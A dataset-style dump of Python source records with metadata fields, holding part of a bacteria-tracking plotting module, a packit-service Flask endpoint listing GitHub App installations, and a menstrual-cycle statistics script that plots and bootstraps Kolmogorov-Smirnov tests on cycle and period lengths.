fullwellimages : list of ndarrays
List of labelled images showing the detected wells
wellcoords : list of arrays
Each entry contains a further list where each entry contains well coordinates
allbacteria : list of arrays
List of labelled images showing the detected bacteria
output_dir : str (path)
Where to save the images
bacteria_lineage : dictionary
A dictionary that links the physical unique label of a bacteria
to one which shows information on its lineage
"""
for tpoint, (image, fullwells, bacteria, coords) in enumerate(
zip(data, fullwellimages, allbacteria, wellcoords)):
# For detection figures, labels not needed (I think)?
plt.figure(figsize=(16, 12))
plt.imshow(image, cmap='gray')
if len(np.unique(fullwells)) == 1:
plt.savefig(os.path.join(
output_dir, "tracking_frame_{:06d}".format(tpoint)))
plt.close()
continue
plt.contour(fullwells > 0, levels=[0.5], colors=['y'])
bacteriaim = np.zeros_like(fullwells)
for welllabel in coords:
bacteriaim[coords[welllabel]] = bacteria[welllabel]
# Add in well labels top left(?) of well contour
#bw = fullwells == welllabel
# if not np.any(bw):
# continue
#pos0 = bw.nonzero()
pos = (np.min(coords[welllabel][0]), np.max(coords[welllabel][1]))
plt.text(pos[1], pos[0], "%d" % welllabel, color="y")
for lab_bac in range(1, bacteriaim.max() + 1):
col = plt.cm.gist_rainbow((lab_bac / 9.1) % 1)
bw0 = bacteriaim == lab_bac
if not np.any(bw0):
continue
plt.contour(bw0, levels=[0.5], colors=[col])
pos0 = bw0.nonzero()
if len(pos0[0]) == 0 or len(pos0[1]) == 0:
continue
#lab_string = label_dict_string[lab_bac]
pos = (np.min(pos0[0]), np.max(pos0[1]))
plt.text(pos[1], pos[0], str(bacteria_lineage[lab_bac]), color=col)
plt.savefig(os.path.join(
output_dir, "tracking_frame_{:06d}".format(tpoint)))
plt.close()
def final_output(measurements, output_dir):
"""outputs a final csv with information on the bacteria detected
Parameters
------
measurements : Custom class instance
Its attribute "bacteria" is a dictionary containing information on
each individual bacteria
output_dir : str (path)
Where to write the csv
"""
output_csv_file = os.path.join(output_dir, 'Results.csv')
with open(output_csv_file, "w", newline='') as file0:
writer = csv.writer(file0)
for numbac, (bac) in enumerate(measurements.bacteria.values()):
if numbac == 0:
writer.writerow(bac.headings_line)
writer.writerow(bac.measurements_output)
| 36.18254
| 85
| 0.611976
|
import csv
import os
import matplotlib.pyplot as plt
import numpy as np
def output_detection_figures(
image, wells, bacteria, timeindex, output_dir):
plt.figure(figsize=(16, 12))
plt.imshow(image, cmap='gray')
plt.contour(wells > 0, levels=[0.5], colors=['y'])
for lab_bac in range(1, bacteria.max() + 1):
col = plt.cm.gist_rainbow((lab_bac / 9.1) % 1)
plt.contour(bacteria == lab_bac, levels=[0.5], colors=[col])
plt.savefig(os.path.join(
output_dir, "detection_frame_{:06d}".format(timeindex)))
plt.close()
def output_tracking_figures(
data,
fullwellimages,
wellcoords,
allbacteria,
output_dir,
bacteria_lineage):
for tpoint, (image, fullwells, bacteria, coords) in enumerate(
zip(data, fullwellimages, allbacteria, wellcoords)):
plt.figure(figsize=(16, 12))
plt.imshow(image, cmap='gray')
if len(np.unique(fullwells)) == 1:
plt.savefig(os.path.join(
output_dir, "tracking_frame_{:06d}".format(tpoint)))
plt.close()
continue
plt.contour(fullwells > 0, levels=[0.5], colors=['y'])
bacteriaim = np.zeros_like(fullwells)
for welllabel in coords:
bacteriaim[coords[welllabel]] = bacteria[welllabel]
pos = (np.min(coords[welllabel][0]), np.max(coords[welllabel][1]))
plt.text(pos[1], pos[0], "%d" % welllabel, color="y")
for lab_bac in range(1, bacteriaim.max() + 1):
col = plt.cm.gist_rainbow((lab_bac / 9.1) % 1)
bw0 = bacteriaim == lab_bac
if not np.any(bw0):
continue
plt.contour(bw0, levels=[0.5], colors=[col])
pos0 = bw0.nonzero()
if len(pos0[0]) == 0 or len(pos0[1]) == 0:
continue
pos = (np.min(pos0[0]), np.max(pos0[1]))
plt.text(pos[1], pos[0], str(bacteria_lineage[lab_bac]), color=col)
plt.savefig(os.path.join(
output_dir, "tracking_frame_{:06d}".format(tpoint)))
plt.close()
def final_output(measurements, output_dir):
output_csv_file = os.path.join(output_dir, 'Results.csv')
with open(output_csv_file, "w", newline='') as file0:
writer = csv.writer(file0)
for numbac, (bac) in enumerate(measurements.bacteria.values()):
if numbac == 0:
writer.writerow(bac.headings_line)
writer.writerow(bac.measurements_output)
| true
| true
|
f70b6cc1626bd36f34f787aa2d060e18f5411270
| 2,294
|
py
|
Python
|
packit_service/service/api/installations.py
|
FalseG0d/packit-service
|
03f840cdfbcc129582a2ec2a20f069c85fea0c56
|
[
"MIT"
] | 1
|
2020-03-28T13:57:08.000Z
|
2020-03-28T13:57:08.000Z
|
packit_service/service/api/installations.py
|
FalseG0d/packit-service
|
03f840cdfbcc129582a2ec2a20f069c85fea0c56
|
[
"MIT"
] | null | null | null |
packit_service/service/api/installations.py
|
FalseG0d/packit-service
|
03f840cdfbcc129582a2ec2a20f069c85fea0c56
|
[
"MIT"
] | null | null | null |
# MIT License
#
# Copyright (c) 2019 Red Hat, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from http import HTTPStatus
from logging import getLogger
try:
from flask_restx import Namespace, Resource
except ModuleNotFoundError:
from flask_restplus import Namespace, Resource
from packit_service.service.events import Event
from packit_service.service.models import Installation
logger = getLogger("packit_service")
ns = Namespace("installations", description="Github App installations")
@ns.route("")
class InstallationsList(Resource):
@ns.response(HTTPStatus.OK, "OK, installations list follows")
def get(self):
"""List all Github App installations"""
return [
Event.ts2str(i["event_data"]) for i in Installation.db().get_all().values()
]
@ns.route("/<int:id>")
@ns.param("id", "Installation identifier")
class InstallationItem(Resource):
@ns.response(HTTPStatus.OK, "OK, installation details follow")
@ns.response(HTTPStatus.NO_CONTENT, "identifier not in whitelist")
def get(self, id):
"""A specific installation details"""
installation = Installation.db().get(id)
no_content = ("", HTTPStatus.NO_CONTENT)
return installation["event_data"] if installation else no_content
| 39.551724
| 87
| 0.745423
|
from http import HTTPStatus
from logging import getLogger
try:
from flask_restx import Namespace, Resource
except ModuleNotFoundError:
from flask_restplus import Namespace, Resource
from packit_service.service.events import Event
from packit_service.service.models import Installation
logger = getLogger("packit_service")
ns = Namespace("installations", description="Github App installations")
@ns.route("")
class InstallationsList(Resource):
@ns.response(HTTPStatus.OK, "OK, installations list follows")
def get(self):
return [
Event.ts2str(i["event_data"]) for i in Installation.db().get_all().values()
]
@ns.route("/<int:id>")
@ns.param("id", "Installation identifier")
class InstallationItem(Resource):
@ns.response(HTTPStatus.OK, "OK, installation details follow")
@ns.response(HTTPStatus.NO_CONTENT, "identifier not in whitelist")
def get(self, id):
installation = Installation.db().get(id)
no_content = ("", HTTPStatus.NO_CONTENT)
return installation["event_data"] if installation else no_content
| true
| true
|
f70b6e0a29deb0c4886c21ece0571ca190b3699c
| 33,970
|
py
|
Python
|
src/characterization/cycle_period_length_analysis.py
|
iurteaga/menstrual_cycle_analysis
|
799c7cb59d759e0c3929164bccdc5c7ce80324d0
|
[
"MIT"
] | 5
|
2020-03-05T23:30:26.000Z
|
2022-02-27T18:16:23.000Z
|
src/characterization/cycle_period_length_analysis.py
|
iurteaga/menstrual_cycle_analysis
|
799c7cb59d759e0c3929164bccdc5c7ce80324d0
|
[
"MIT"
] | null | null | null |
src/characterization/cycle_period_length_analysis.py
|
iurteaga/menstrual_cycle_analysis
|
799c7cb59d759e0c3929164bccdc5c7ce80324d0
|
[
"MIT"
] | 2
|
2021-03-26T19:56:51.000Z
|
2021-12-22T02:26:14.000Z
|
#!/usr/bin/python
# Imports
import sys, os, re, time
import argparse
import pdb
import pickle
from itertools import *
# Science
import numpy as np
import scipy.stats as stats
import pandas as pd
# Plotting
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import colors
from mpl_toolkits.mplot3d import Axes3D
################################## FUNCTIONS ############################
# Population time-series
def population_time_series_embedding_lengths(cycle_stats_df, attribute, cutoff_criteria, cutoff, sample_style, save_dir):
'''
Function that plots a population level time series embedding of cycle and period lengths
In plot:
x axis is length_attribute for cycle 1,
y axis is length attribute for cycle 2,
z is for cycle 3
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
sample_style: whether to pick 3 consecutive 'random' or 'first' cycles per-user
save_dir: path where to save plot
Output:
None
'''
#get users with color by attribute > cutoff, and <= cutoff
cycle_stats_df_greater_than = cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]
cycle_stats_df_less_than = cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]
cycle_lengths_greater_than = cycle_stats_df_greater_than[attribute]
cycle_lengths_less_than = cycle_stats_df_less_than[attribute]
# Filename
if sample_style == 'first':
filename = '{}/population_time_series_embedding_for_{}_split_by_{}_{}_first_3.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
if sample_style == 'random':
filename = '{}/population_time_series_embedding_for_{}_split_by_{}_{}_sample_3.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
# Plot
colors = ['orange', 'c']
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for index, cycle_lengths in enumerate([cycle_lengths_greater_than, cycle_lengths_less_than]):
print('Start selecting cycles for one group')
if sample_style=='first':
sample_cycle_lengths = [cycle_length[:3] for cycle_length in cycle_lengths if len(cycle_length) >= 3]
if sample_style=='random':
sample_cycle_lengths = []
for cycle_length in cycle_lengths:
if len(cycle_length) >= 3:
num_cycles_array = np.linspace(0, len(cycle_length)-3, len(cycle_length)-2)
start_index = np.random.choice(num_cycles_array, size=1).astype(int)[0]
sample_cycle_lengths.append(cycle_length[start_index:start_index+3])
print('Finished selecting cycles for one group')
print('Start plotting one group')
for i in range(len(sample_cycle_lengths)):
xs = sample_cycle_lengths[i][0]
ys = sample_cycle_lengths[i][1]
zs = sample_cycle_lengths[i][2]
# Plot this point
ax.scatter(xs, ys, zs, color = colors[index], s=1, alpha=0.3)
print('Finished plotting one group')
ax.set_xlabel(attribute+ '[i]')
ax.set_ylabel(attribute+ '[i+1]')
ax.set_zlabel(attribute+ '[i+2]')
if attribute == 'cycle_lengths':
#ref_line_points = np.linspace(10, 90, 10)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(10,90)
ax.set_ylim3d(10,90)
ax.set_zlim3d(10,90)
elif attribute == 'period_lengths':
max_period_days=28
#ref_line_points = np.linspace(1, max_period_days, 4)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(1,max_period_days)
ax.set_ylim3d(1,max_period_days)
ax.set_zlim3d(1,max_period_days)
ax.set_xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_yticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_zticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.savefig(filename.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
# With angles
for angle in [30, 60, 90, 180]:
print('Start one view')
filename_angle = filename[:-4]+'_'+str(angle)+'.pdf'
ax.view_init(elev=None, azim=angle)
# Add (a)/(b) labels for paper
ax.text2D(12, 7,'(a)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(filename_angle.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
plt.close()
# Time series embedding for a randomly chosen user
def random_time_series_embedding_lengths(cycle_stats_df, attribute, cutoff_criteria, cutoff, save_dir):
'''
Function that plots a time series embedding of cycle and period lengths for a randomly chosen user per group
In plot:
x axis is length_attribute for cycle i,
y axis is length attribute for cycle i+1,
z is for cycle i+2
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
save_dir: path where to save plot
Output:
None
'''
# Select users with median number of cycles tracked
cycle_stats_df_median = cycle_stats_df[cycle_stats_df['num_cycles_tracked'] == 11]
filename = '{}/random_time_series_embedding_for_{}_split_by_{}_{}.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
#get users with color by attribute > cutoff, and <= cutoff
cycle_stats_df_greater_than = cycle_stats_df_median[cycle_stats_df_median[cutoff_criteria] > cutoff]
cycle_stats_df_less_than = cycle_stats_df_median[cycle_stats_df_median[cutoff_criteria] <= cutoff]
cycle_lengths_greater_than = cycle_stats_df_greater_than[attribute]
cycle_lengths_less_than = cycle_stats_df_less_than[attribute]
# Randomly pick a user from each group
cycle_lengths_greater_than_user = np.random.choice(cycle_lengths_greater_than, size=1, replace=False)
cycle_lengths_less_than_user = np.random.choice(cycle_lengths_less_than, size=1, replace=False)
# Plot
colors = ['orange', 'c']
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
#plot each user, color by median intercycle length
xs = list(cycle_lengths_greater_than_user[0][0:-2])
ys = list(cycle_lengths_greater_than_user[0][1:-1])
zs = list(cycle_lengths_greater_than_user[0][2:])
ax.scatter(xs, ys, zs, color = 'orange')
ax.plot(xs, ys, zs, color='orange', linestyle='dashed', alpha=0.8)
xs = list(cycle_lengths_less_than_user[0][0:-2])
ys = list(cycle_lengths_less_than_user[0][1:-1])
zs = list(cycle_lengths_less_than_user[0][2:])
ax.scatter(xs, ys, zs, color = 'c')
ax.plot(xs, ys, zs, color='c', linestyle='dashed', alpha=0.8)
ax.set_xlabel(attribute+ '[i]')
ax.set_ylabel(attribute+ '[i+1]')
ax.set_zlabel(attribute+ '[i+2]')
if attribute == 'cycle_lengths':
#ref_line_points = np.linspace(10, 90, 10)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(10,90)
ax.set_ylim3d(10,90)
ax.set_zlim3d(10,90)
elif attribute == 'period_lengths':
max_period_days=28
#ref_line_points = np.linspace(1, max_period_days, 4)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(1,max_period_days)
ax.set_ylim3d(1,max_period_days)
ax.set_zlim3d(1,max_period_days)
ax.set_xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_yticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_zticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.savefig(filename.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
# With angles
for angle in [30, 60, 90, 180]:
print('Start one view')
filename_angle = filename[:-4]+'_'+str(angle)+'.pdf'
ax.view_init(elev=None, azim=angle)
plt.savefig(filename_angle.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
plt.close()
# Plot period and cycle length distributions per group
def plot_lengths_hist_by_attribute_cutoff(cycle_stats_df, cycle_df, attribute, cutoff_criteria, cutoff, pdf_or_cdf, save_dir):
'''
Function that plots cycle and period length distributions across groups
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
cycle_df: pandas dataframe, with information about each user's cycle
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
pdf_or_cdf: whether to plot 'pdf's or 'cdf's
save_dir: path where to save plot
Output:
None
'''
# Identify groups per cutoff criteria
users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_greater_than_cutoff)]
cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_less_than_cutoff)]
colors = ['orange', 'c']
labels=['Highly variable', 'NOT highly variable']
if attribute == 'cycle_length':
# Compute histogram
# Bins based on integer range of values
my_bins=np.arange(
np.min([cycles_users_greater_than_cutoff[attribute].dropna().min(), cycles_users_less_than_cutoff[attribute].dropna().min()]),
np.max([cycles_users_greater_than_cutoff[attribute].dropna().max(), cycles_users_less_than_cutoff[attribute].dropna().max()])+1)
all_counts, all_bins = np.histogram(cycle_df[attribute].dropna(), bins=my_bins, density=True)
counts_greater_than_cutoff, bins_greater_than_cutoff = np.histogram(cycles_users_greater_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
counts_less_than_cutoff, bins_less_than_cutoff = np.histogram(cycles_users_less_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
# Separate PDF/CDF plots
if pdf_or_cdf=='pdf':
# PDF
hist_type='stepfilled'
cumulative=False
y_label='P(Cycle length = n)'
cohort_filename = '{}/{}_pdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_pdf_per_group.pdf'.format(save_dir, attribute)
elif pdf_or_cdf=='cdf':
# CDF
hist_type='step'
cumulative=True
y_label='P(Cycle length $\leq$ n)'
cohort_filename = '{}/{}_cdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_cdf_per_group.pdf'.format(save_dir, attribute)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
# Population
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.arange(my_bins.min(), my_bins.max()+1, 10))
plt.xlabel('Cycle length in days')
plt.ylabel(y_label)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
# Per-group
plt.hist(bins_greater_than_cutoff[:-1], bins_greater_than_cutoff, weights=counts_greater_than_cutoff, density=True, cumulative=cumulative, color=colors[0], alpha=0.5, label=labels[0], histtype=hist_type)
plt.hist(bins_less_than_cutoff[:-1], bins_less_than_cutoff, weights=counts_less_than_cutoff, density=True, cumulative=cumulative, color=colors[1], alpha=0.5, label=labels[1], histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.arange(my_bins.min(), my_bins.max()+1, 10))
plt.xlabel('Cycle length in days')
plt.ylabel(y_label)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(per_group_filename, format='pdf', bbox_inches='tight')
plt.close()
elif attribute == 'period_length':
# Compute histogram
# Bins based on integer range of values
my_bins=np.arange(
np.min([cycles_users_greater_than_cutoff[attribute].dropna().min(), cycles_users_less_than_cutoff[attribute].dropna().min()]),
np.max([cycles_users_greater_than_cutoff[attribute].dropna().max(), cycles_users_less_than_cutoff[attribute].dropna().max()])+1)
all_counts, all_bins = np.histogram(cycle_df[attribute].dropna(), bins=my_bins, density=True)
counts_greater_than_cutoff, bins_greater_than_cutoff = np.histogram(cycles_users_greater_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
counts_less_than_cutoff, bins_less_than_cutoff = np.histogram(cycles_users_less_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
# Separate PDF/CDF plots
max_period_days=28
if pdf_or_cdf=='pdf':
# PDF
hist_type='stepfilled'
cumulative=False
y_label='P(Period length = n)'
cohort_filename = '{}/{}_pdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_pdf_per_group.pdf'.format(save_dir, attribute)
elif pdf_or_cdf=='cdf':
# CDF
hist_type='step'
cumulative=True
y_label='P(Period length $\leq$ n)'
cohort_filename = '{}/{}_cdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_cdf_per_group.pdf'.format(save_dir, attribute)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
# Population
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.xlim(1,max_period_days)
plt.xlabel('Period length in days')
plt.ylabel(y_label)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
# Per-group
plt.hist(bins_greater_than_cutoff[:-1], bins_greater_than_cutoff, weights=counts_greater_than_cutoff, density=True, cumulative=cumulative, color=colors[0], alpha=0.5, label=labels[0], histtype=hist_type)
plt.hist(bins_less_than_cutoff[:-1], bins_less_than_cutoff, weights=counts_less_than_cutoff, density=True, cumulative=cumulative, color=colors[1], alpha=0.5, label=labels[1], histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.xlim(1,max_period_days)
plt.xlabel('Period length in days')
plt.ylabel(y_label)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(per_group_filename, format='pdf', bbox_inches='tight')
plt.close()
else:
raise ValueError('Unknown attribute {}'.format(attribute))
# Bootstrapped-KS for cycle and period length
def bootstrapped_cycle_period_lengths_KS(cycle_stats_df, cycle_df, cutoff_criteria, cutoff, n_bootstrapping, results_dir):
'''
Function that computes cycle and period length Kolmogorov-Smirnov tests between group distributions, based on bootstrapping
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
cycle_df: pandas dataframe, with information about user's cycle
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
n_bootstrapping: Number of bootstrapped samples to use for the analysis
save_dir: path where to save plot
Output:
None
'''
# True separation of users into groups
true_users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
true_users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
n_users_greater_than_cutoff=true_users_greater_than_cutoff.size
n_users_less_than_cutoff=true_users_less_than_cutoff.size
########### TRUE OBSERVERD STATISTICS ##########
# Cycles per-group
true_cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(true_users_greater_than_cutoff)]
true_cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(true_users_less_than_cutoff)]
# KS cycle_length
true_KS_cycle_length, true_p_val_cycle_length = stats.ks_2samp(true_cycles_users_greater_than_cutoff['cycle_length'].dropna(), true_cycles_users_less_than_cutoff['cycle_length'].dropna())
# KS period_length
true_KS_period_length, true_p_val_period_length = stats.ks_2samp(true_cycles_users_greater_than_cutoff['period_length'].dropna(), true_cycles_users_less_than_cutoff['period_length'].dropna())
########### BOOTSTRAP BASED STATISTICS ##########
# Computed suff statistics
bootstrapped_KS_cycle_length=np.zeros(n_bootstrapping)
bootstrapped_p_val_cycle_length=np.zeros(n_bootstrapping)
bootstrapped_KS_period_length=np.zeros(n_bootstrapping)
bootstrapped_p_val_period_length=np.zeros(n_bootstrapping)
for n_bootstrap in np.arange(n_bootstrapping):
#print('Sample={}/{}'.format(n_bootstrap,n_bootstrapping))
# Bootstrapped sample indicators
bootstrapped_users_greater_than_cutoff=np.random.choice(true_users_greater_than_cutoff,n_bootstrapping)
bootstrapped_users_less_than_cutoff=np.random.choice(true_users_less_than_cutoff,n_bootstrapping)
# Cycles per-group
bootstrapped_cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(bootstrapped_users_greater_than_cutoff)]
bootstrapped_cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(bootstrapped_users_less_than_cutoff)]
# KS cycle_length
bootstrapped_KS_cycle_length[n_bootstrap], bootstrapped_p_val_cycle_length[n_bootstrap] = stats.ks_2samp(bootstrapped_cycles_users_greater_than_cutoff['cycle_length'].dropna(), bootstrapped_cycles_users_less_than_cutoff['cycle_length'].dropna())
# KS period_length
bootstrapped_KS_period_length[n_bootstrap], bootstrapped_p_val_period_length[n_bootstrap] = stats.ks_2samp(bootstrapped_cycles_users_greater_than_cutoff['period_length'].dropna(), bootstrapped_cycles_users_less_than_cutoff['period_length'].dropna())
# Print bootstrap results
print('*************************************************************************')
print('******** Cycle-length KS={} (p={}) ***********'.format(true_KS_cycle_length, true_p_val_cycle_length))
print('******** Cycle-length Bootstrapped KS={}+/-{} (p={} (+/-{}))***********'.format(
bootstrapped_KS_cycle_length.mean(), bootstrapped_KS_cycle_length.std(), bootstrapped_p_val_cycle_length.mean(), bootstrapped_p_val_cycle_length.std()
))
print('******** Cycle-length Bootstrapped KS={}({},{}) p={} ({},{}))***********'.format(
bootstrapped_KS_cycle_length.mean(), np.percentile(bootstrapped_KS_cycle_length, 2.5, axis=0), np.percentile(bootstrapped_KS_cycle_length, 97.5, axis=0),
bootstrapped_p_val_cycle_length.mean(), np.percentile(bootstrapped_p_val_cycle_length, 2.5, axis=0), np.percentile(bootstrapped_p_val_cycle_length, 97.5, axis=0)
))
print('*************************************************************************')
print('******** Period-length KS={} (p={}) ***********'.format(true_KS_period_length, true_p_val_period_length))
print('******** Period-length Bootstrapped KS={}+/-{} (p={} (+/-{}))***********'.format(
bootstrapped_KS_period_length.mean(), bootstrapped_KS_period_length.std(), bootstrapped_p_val_period_length.mean(), bootstrapped_p_val_period_length.std()
))
print('******** Period-length Bootstrapped KS={}({},{}) p={} ({},{}))***********'.format(
bootstrapped_KS_period_length.mean(), np.percentile(bootstrapped_KS_period_length, 2.5, axis=0), np.percentile(bootstrapped_KS_period_length, 97.5, axis=0),
bootstrapped_p_val_period_length.mean(), np.percentile(bootstrapped_p_val_period_length, 2.5, axis=0), np.percentile(bootstrapped_p_val_period_length, 97.5, axis=0)
))
print('*************************************************************************')
# Average statistics over cycle-id
def plot_avg_lengths_by_attribute_cutoff(cycle_stats_df, cycle_df, attribute, cutoff_criteria, cutoff, save_dir):
'''
Function that plots cycle and period length average and standard deviation across user's timeline (i.e., by cycle-id) across groups
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
cycle_df: pandas dataframe, with information about each user's cycle
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
save_dir: path where to save plot
Output:
None
'''
# Identify groups per cutoff criteria
users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_greater_than_cutoff)]
cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_less_than_cutoff)]
# Plotting
colors = ['slateblue', 'c', 'orange']
max_cycle_id=20
if attribute == 'cycle_length':
fig, axes = plt.subplots(3, 1, sharex='all', sharey='all', figsize = (15,15))
for index, dataset in enumerate([cycle_df, cycles_users_less_than_cutoff, cycles_users_greater_than_cutoff]):
means = dataset.groupby(['cycle_id'])[attribute].mean()[:max_cycle_id]
std = dataset.groupby(['cycle_id'])[attribute].std()[:max_cycle_id]
# Plot
axes[index].plot(np.unique(dataset['cycle_id'])[:20], means, color = colors[index])
axes[index].autoscale(enable=True, tight=True, axis='x')
axes[index].fill_between(np.unique(dataset['cycle_id'])[:max_cycle_id], means - std, means + std, alpha=0.4, color=colors[index])
axes[index].set_xticks(np.append([1],np.arange(2,max_cycle_id+1,2)))
axes[index].set_xlabel('Cycle ID')
axes[index].set_ylabel('Cycle length')
axes[index].set_ylim(20,55)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(a)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
# Save and close
plt.savefig('{}/avg_{}_per_cycle_id.pdf'.format(save_dir,attribute), format='pdf', bbox_inches='tight')
plt.close()
elif attribute == 'period_length':
fig, axes = plt.subplots(3, 1, sharex='all', sharey='all', figsize = (15,15))
for index, dataset in enumerate([cycle_df, cycles_users_less_than_cutoff, cycles_users_greater_than_cutoff]):
means = dataset.groupby(['cycle_id'])[attribute].mean()[:max_cycle_id]
std = dataset.groupby(['cycle_id'])[attribute].std()[:max_cycle_id]
# Plot
axes[index].plot(np.unique(dataset['cycle_id'])[:20], means, color = colors[index])
axes[index].autoscale(enable=True, tight=True, axis='x')
axes[index].fill_between(np.unique(dataset['cycle_id'])[:max_cycle_id], means - std, means + std, alpha=0.4, color=colors[index])
axes[index].set_xticks(np.append([1],np.arange(2,max_cycle_id+1,2)))
axes[index].set_xlabel('Cycle ID')
axes[index].set_ylabel('Period length')
axes[index].set_ylim(1,9)
# Add (a)/(b) labels for paper
